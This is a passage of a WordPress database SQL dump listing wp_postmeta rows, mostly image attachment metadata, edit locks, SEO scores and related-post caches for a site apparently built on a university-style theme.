(8427, 3843, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1568;s:6:\"height\";i:1044;s:4:\"file\";s:59:\"2018/08/39894734_1935072023179659_5433646843672133632_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"39894734_1935072023179659_5433646843672133632_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"39894734_1935072023179659_5433646843672133632_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"39894734_1935072023179659_5433646843672133632_o-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"39894734_1935072023179659_5433646843672133632_o-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"39894734_1935072023179659_5433646843672133632_o-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8428, 3841, '_thumbnail_id', '3843'),
(8432, 3841, '_hide_featured', NULL),
(8433, 3841, '_yoast_wpseo_content_score', '30'),
(8434, 3841, '_yoast_wpseo_primary_category', ''),
(8435, 3841, '_wpas_done_all', '1'),
(8436, 3845, '_edit_lock', '1535611554:3'),
(8437, 3845, '_edit_last', '3'),
(8438, 3846, '_wp_attached_file', '2018/08/39891332_664866327222892_1834997886425759744_o.jpg'),
(8439, 3846, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1568;s:6:\"height\";i:1044;s:4:\"file\";s:58:\"2018/08/39891332_664866327222892_1834997886425759744_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"39891332_664866327222892_1834997886425759744_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"39891332_664866327222892_1834997886425759744_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"39891332_664866327222892_1834997886425759744_o-768x511.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"39891332_664866327222892_1834997886425759744_o-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"39891332_664866327222892_1834997886425759744_o-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8440, 3845, '_thumbnail_id', '3846'),
(8444, 3845, '_hide_featured', NULL),
(8445, 3845, '_yoast_wpseo_content_score', '30'),
(8446, 3845, '_yoast_wpseo_primary_category', ''),
(8447, 3845, '_wpas_done_all', '1'),
(8448, 3848, '_edit_lock', '1535611669:3'),
(8449, 3848, '_edit_last', '3'),
(8450, 3849, '_wp_attached_file', '2018/08/28-8-2561-9-45-00.jpg'),
(8451, 3849, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:460;s:6:\"height\";i:626;s:4:\"file\";s:29:\"2018/08/28-8-2561-9-45-00.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"28-8-2561-9-45-00-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"28-8-2561-9-45-00-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"28-8-2561-9-45-00-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8452, 3850, '_wp_attached_file', '2018/08/39777403_664889000553958_8017799211066064896_o.jpg'),
(8453, 3850, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/39777403_664889000553958_8017799211066064896_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"39777403_664889000553958_8017799211066064896_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"39777403_664889000553958_8017799211066064896_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"39777403_664889000553958_8017799211066064896_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"39777403_664889000553958_8017799211066064896_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"39777403_664889000553958_8017799211066064896_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8454, 3848, '_thumbnail_id', '3850'),
(8458, 3848, '_hide_featured', NULL),
(8459, 3848, '_yoast_wpseo_content_score', '30'),
(8460, 3848, '_yoast_wpseo_primary_category', ''),
(8461, 3848, '_wpas_done_all', '1'),
(8462, 3848, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575602062;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5926;}i:1;a:1:{s:2:\"id\";i:4964;}i:2;a:1:{s:2:\"id\";i:3968;}}}}'),
(8463, 3852, '_edit_lock', '1535954303:3'),
(8464, 3852, '_edit_last', '3'),
(8465, 3853, '_wp_attached_file', '2018/08/39835076_664957580547100_3218962165968928768_o.jpg'),
(8466, 3853, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/39835076_664957580547100_3218962165968928768_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"39835076_664957580547100_3218962165968928768_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"39835076_664957580547100_3218962165968928768_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"39835076_664957580547100_3218962165968928768_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"39835076_664957580547100_3218962165968928768_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"39835076_664957580547100_3218962165968928768_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8467, 3852, '_thumbnail_id', '3853'),
(8471, 3852, '_hide_featured', NULL),
(8472, 3852, '_yoast_wpseo_content_score', '30'),
(8473, 3852, '_yoast_wpseo_primary_category', ''),
(8474, 3852, '_wpas_done_all', '1'),
(8475, 3855, '_edit_lock', '1535426444:3'),
(8476, 3855, '_edit_last', '3'),
(8477, 3856, '_wp_attached_file', '2018/08/40045427_1940238999329628_2722430003424788480_o.jpg'),
(8478, 3856, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:59:\"2018/08/40045427_1940238999329628_2722430003424788480_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"40045427_1940238999329628_2722430003424788480_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"40045427_1940238999329628_2722430003424788480_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"40045427_1940238999329628_2722430003424788480_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"40045427_1940238999329628_2722430003424788480_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"40045427_1940238999329628_2722430003424788480_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8479, 3855, '_thumbnail_id', '3856'),
(8483, 3855, '_hide_featured', NULL),
(8484, 3855, '_yoast_wpseo_content_score', '30'),
(8485, 3855, '_yoast_wpseo_primary_category', '31'),
(8486, 3855, '_wpas_done_all', '1'),
(8487, 3852, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575517035;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6330;}i:1;a:1:{s:2:\"id\";i:4160;}i:2;a:1:{s:2:\"id\";i:5156;}}}}'),
(8488, 3855, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575691854;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5855;}i:1;a:1:{s:2:\"id\";i:5294;}i:2;a:1:{s:2:\"id\";i:5301;}}}}'),
(8491, 3859, '_thumbnail_id', '3831'),
(8492, 3859, '_yoast_wpseo_primary_category', '4'),
(8493, 3859, '_edit_lock', '1535447285:3'),
(8494, 3859, '_edit_last', '3'),
(8498, 3859, '_hide_featured', NULL),
(8499, 3859, '_yoast_wpseo_content_score', '30'),
(8500, 3859, '_wpas_done_all', '1'),
(8501, 3841, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575589026;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4701;}i:1;a:1:{s:2:\"id\";i:4632;}i:2;a:1:{s:2:\"id\";i:4986;}}}}'),
(8502, 3859, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575215334;s:7:\"payload\";a:0:{}}}'),
(8505, 3845, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575659500;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5957;}i:1;a:1:{s:2:\"id\";i:4967;}i:2;a:1:{s:2:\"id\";i:5200;}}}}'),
(8506, 3837, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575538565;s:7:\"payload\";a:0:{}}}'),
(8507, 3862, '_edit_lock', '1535527676:3'),
(8508, 3862, '_edit_last', '3'),
(8509, 3863, '_wp_attached_file', '2018/08/40158656_669946960048162_2557683768143904768_o.jpg'),
(8510, 3863, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/40158656_669946960048162_2557683768143904768_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"40158656_669946960048162_2557683768143904768_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"40158656_669946960048162_2557683768143904768_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"40158656_669946960048162_2557683768143904768_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"40158656_669946960048162_2557683768143904768_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"40158656_669946960048162_2557683768143904768_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8514, 3862, '_hide_featured', NULL),
(8515, 3862, '_yoast_wpseo_content_score', '30'),
(8516, 3862, '_yoast_wpseo_primary_category', '31'),
(8517, 3862, '_wpas_done_all', '1'),
(8518, 3862, '_thumbnail_id', '3863'),
(8521, 3862, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575545431;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6154;}i:1;a:1:{s:2:\"id\";i:5026;}i:2;a:1:{s:2:\"id\";i:5179;}}}}'),
(8522, 3865, '_thumbnail_id', '3843'),
(8523, 3865, '_yoast_wpseo_primary_category', '4'),
(8524, 3865, '_edit_last', '3'),
(8528, 3865, '_hide_featured', NULL),
(8529, 3865, '_yoast_wpseo_content_score', '30'),
(8530, 3865, '_wpas_done_all', '1'),
(8531, 3865, '_edit_lock', '1535531976:3'),
(8534, 3868, '_wp_attached_file', '2018/08/30-8-2561-10-27-44.jpg'),
(8535, 3868, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:504;s:6:\"height\";i:664;s:4:\"file\";s:30:\"2018/08/30-8-2561-10-27-44.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"30-8-2561-10-27-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"30-8-2561-10-27-44-228x300.jpg\";s:5:\"width\";i:228;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"30-8-2561-10-27-44-228x300.jpg\";s:5:\"width\";i:228;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8536, 3869, '_thumbnail_id', '3846'),
(8537, 3869, '_yoast_wpseo_primary_category', '4'),
(8538, 3869, '_edit_lock', '1535611752:3'),
(8539, 3869, '_edit_last', '3'),
(8543, 3869, '_hide_featured', NULL),
(8544, 3869, '_yoast_wpseo_content_score', '30'),
(8545, 3869, '_wpas_done_all', '1'),
(8546, 3871, '_thumbnail_id', '3850'),
(8547, 3871, '_yoast_wpseo_primary_category', '4'),
(8548, 3871, '_edit_lock', '1535612671:3'),
(8549, 3871, '_edit_last', '3');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(8553, 3871, '_hide_featured', NULL),
(8554, 3871, '_yoast_wpseo_content_score', '30'),
(8555, 3871, '_wpas_done_all', '1'),
(8556, 3865, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1574957230;s:7:\"payload\";a:0:{}}}'),
(8557, 3874, '_edit_lock', '1535688570:3'),
(8558, 3874, '_edit_last', '3'),
(8563, 3874, '_hide_featured', NULL),
(8564, 3874, '_yoast_wpseo_content_score', '60'),
(8565, 3874, '_yoast_wpseo_primary_category', '3'),
(8566, 3874, '_wpas_done_all', '1'),
(8567, 3874, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575575595;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4662;}i:1;a:1:{s:2:\"id\";i:4172;}i:2;a:1:{s:2:\"id\";i:4006;}}}}'),
(8568, 3869, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575696546;s:7:\"payload\";a:0:{}}}'),
(8569, 3871, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575594143;s:7:\"payload\";a:0:{}}}'),
(8570, 3878, '_edit_lock', '1535953657:3'),
(8571, 3878, '_edit_last', '3'),
(8572, 3879, '_wp_attached_file', '2018/09/3-9-2561-12-50-02.jpg'),
(8573, 3879, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:456;s:6:\"height\";i:643;s:4:\"file\";s:29:\"2018/09/3-9-2561-12-50-02.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"3-9-2561-12-50-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"3-9-2561-12-50-02-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"3-9-2561-12-50-02-213x300.jpg\";s:5:\"width\";i:213;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8574, 3880, '_wp_attached_file', '2018/09/40380036_670446053331586_5221965175715790848_o.jpg'),
(8575, 3880, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/09/40380036_670446053331586_5221965175715790848_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"40380036_670446053331586_5221965175715790848_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"40380036_670446053331586_5221965175715790848_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"40380036_670446053331586_5221965175715790848_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"40380036_670446053331586_5221965175715790848_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"40380036_670446053331586_5221965175715790848_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8576, 3878, '_thumbnail_id', '3880'),
(8580, 3878, '_hide_featured', NULL),
(8581, 3878, '_yoast_wpseo_content_score', '30'),
(8582, 3878, '_yoast_wpseo_primary_category', '31'),
(8583, 3878, '_wpas_done_all', '1'),
(8584, 3882, '_edit_lock', '1535953941:3'),
(8585, 3882, '_edit_last', '3'),
(8586, 3883, '_wp_attached_file', '2018/09/40358220_670466216662903_249021310468882432_o.jpg'),
(8587, 3883, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1620;s:6:\"height\";i:1080;s:4:\"file\";s:57:\"2018/09/40358220_670466216662903_249021310468882432_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:57:\"40358220_670466216662903_249021310468882432_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:57:\"40358220_670466216662903_249021310468882432_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:57:\"40358220_670466216662903_249021310468882432_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:58:\"40358220_670466216662903_249021310468882432_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:57:\"40358220_670466216662903_249021310468882432_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8588, 3882, '_thumbnail_id', '3883'),
(8592, 3882, '_hide_featured', NULL),
(8593, 3882, '_yoast_wpseo_content_score', '30'),
(8594, 3882, '_yoast_wpseo_primary_category', '31'),
(8595, 3882, '_wpas_done_all', '1'),
(8596, 3885, '_edit_lock', '1535954496:3'),
(8597, 3885, '_edit_last', '3'),
(8598, 3886, '_wp_attached_file', '2018/09/40595657_1951606901526171_1882888197705302016_o.jpg'),
(8599, 3886, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1728;s:6:\"height\";i:1296;s:4:\"file\";s:59:\"2018/09/40595657_1951606901526171_1882888197705302016_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"40595657_1951606901526171_1882888197705302016_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"40595657_1951606901526171_1882888197705302016_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"40595657_1951606901526171_1882888197705302016_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"40595657_1951606901526171_1882888197705302016_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"40595657_1951606901526171_1882888197705302016_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s